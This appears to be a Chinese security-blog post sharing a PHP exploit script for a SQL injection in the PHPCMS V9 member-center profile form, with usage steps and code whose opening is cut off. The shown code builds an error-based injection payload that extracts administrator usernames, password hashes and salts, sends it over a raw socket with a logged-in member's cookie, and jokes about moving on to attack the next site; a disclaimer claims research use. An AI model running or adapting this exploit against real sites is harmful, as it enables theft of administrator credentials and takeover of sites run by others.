PHPCMS V9会员中心会员资料修改处未正确处理,导致SQL注入漏洞,最早好像是T00LS上面发的,最后有人转到乌云上面,官方已经修补好了漏洞,请使用此CMS的用户尽快升级。可能很多大牛都有EXP了,但是没有见人发出来。才学php,学着写了个,总有些小问题,希望大牛帮着改进一下。
使用方法:
1、请先注册个会员,登陆得到cookie,填写到cookie变量那里,然后执行就可以了。
2、可能部分人使用得不到数据,请修改一下UserAgent为你自己的即可。
利用代码如下:
' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
} else {
echo $i . '-->' . $admin_match[1] . "\n";
}
//echo $admin_match[1]. "\n";
//echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
//echo mb_convert_encoding($admin_match[1],'gbk','auto')."\n";
}
}
//使用foreach速度比使用for快
// if (preg_match('/Duplicate/', send_pack($cmd2))) {
// for ($i = 0; $i < $count; $i++) {
// $payload = 'nickname=test&info%5Bbirthday%3D%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+distinct+concat%280x23%2Cusername%2C0x3a%2Cpassword%2C0x3a%2Cencrypt%2C0x23%29+FROM+' . $tableadmin . '+Order+by+userid+LIMIT+' . $i . '%2C1%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%5D=2013-02-08&dosubmit=%E6%8F%90%E4%BA%A4';
// preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match);
// if (preg_match('/charset=utf-8/', send_pack($payload))) {
// echo $i . '-->' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
// } else {
// echo $i . '-->' . $admin_match[1] . "\n";
// }
// }
// }
} else {
exit("报告大人,网站不存在此漏洞,你可以继续秒下一个!\n");
}
function send_pack($cmd)
{
global $host, $path, $cookie;
$data = "POST " . $path . "/index.php?m=member&c=index&a=account_manage_info&t=1 HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Referer: http://" . $host . $path . "/index.php?m=member&c=index&a=account_manage_info&t=1\r\n";
$data .= "Cookie: " . $cookie . "\r\n";
$data .= "Connection: Close\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: " . strlen($cmd) . "\r\n\r\n";
$data .= $cmd . "\r\n";
$fp = @fsockopen($host, 80, $errno, $errstr, 30);
//echo ini_get('default_socket_timeout');//默认超时时间为60秒
if (!$fp) {
echo $errno . '-->' . $errstr;
exit('Could not connect to: ' . $host);
} else {
fwrite($fp, $data);
$back = '';
while (!feof($fp)) {
$back .= fread($fp, 1024);
}
fclose($fp);
}
return $back;
}
//时间统计函数
function func_time()
{
list($microsec, $sec) = explode(' ', microtime());
return $microsec + $sec;
}
echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒';
?>
from www.waitalone.cn.thanks for it.
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论